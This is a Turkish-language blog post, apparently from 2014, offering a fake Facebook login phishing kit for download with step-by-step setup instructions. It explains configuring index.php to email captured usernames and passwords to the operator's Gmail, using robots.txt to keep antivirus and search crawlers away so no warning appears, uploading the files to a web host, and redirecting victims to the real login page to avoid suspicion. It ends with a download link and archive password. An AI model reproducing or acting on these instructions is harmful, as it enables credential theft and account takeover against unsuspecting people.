Fake facebook scritp indir 2014

İçerik açılmıştır. Yorum yazdığınız için teşekkürler.valid
Evet arkadaşlar, bomba gibi bir paylaşımla karşınızdayım.

Kurulum ;
Öncelikle fake dosyamızı indiriyoruz ve arşivden çıkarıyoruz. index.php dosyamızı herhangi bir metin editörüyle açalım, bu facebook dosyamızdır, karışık olduğuna bakmayın, sadece bir kaç satırı degiştirmeniz yeterlidir. //mail adresinizi yazın şeklindeki yazıların karşısındaki mail@gmail.com kısmını kendi gmailimizle degiştirelim. toplamda 2 yere mail adresinizi girmeniz gerekmekte.
// mail adresinizin şifresini yazın yazısının ön kısmındaki sifre yazan yere mail adresimizin şifresini yazalım. Hepsi bu kadar başka bir degişiklik gerekmiyor. Dosyayı kaydedip çıkalım.

Resim, takriben 25% (600x278) ölçeklenmiştir. Orjinal boyutta (790x365) görmek için bu çubuğa tıklayın. Yeni bir pencerede açmak için resme tıklayın.
[Resim: 66Is2.png]


Diger dosyalarda degişiklik yapmanıza gerek yok. smtp.php ve mailler.php bizim classlarımız, ve smtp ile mail gönderimi
için gerekli dosyalar, bu dosyalarda hiç bir degişiklik yapmıyoruz. robots.txt dosyamızda;
User-agent: * - Disallow: /
[Resim: 66Ix8.png]
Yazmaktadır, yani bu dosya arama motoru ve antivirüs yazılımlarının tarama botlarını engeller ve böylelikle fake sayfanızda hiç bir güvenlik uyarısı çıkmaz. Fakemiz için son adımı gerçekleştirelim.

Filezilla dosya transfer programımızı açıyoruz. gerekli bilgileri giriyoruz ve hostumuza baglanıyoruz. public_html klasörü içerisine fake dosyalarımızı atıyoruz. Toplamda 4 dosya atılacak. Aktarım tamamlanınca sitemize girelim. Gördügünüz gibi fakemiz açıldı, rastgele bilgilerle giriş yapmaya çalışalım. Giriş yapınca bizi şüphe çekmemek için tekrar orjinal login sayfasına yönlendirecektir.

Resim, takriben 39% (600x243) ölçeklenmiştir. Orjinal boyutta (979x395) görmek için bu çubuğa tıklayın. Yeni bir pencerede açmak için resme tıklayın.
[Resim: 66IF1.png]


Girilen şifreye gmail hesabınızda oturum açıp ulaşabilirsiniz. Gördügünüz gibi mail gelmiş, gayet anlaşılır bir şekilde, mail ve şifre bize postalanmış.

İlk gazimiz Smile
[Resim: 66N0c.png]

Download: http://puu.sh/66INF.rar
Rar-pass: securehatz
Share on Google Plus

About Life

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 yorum: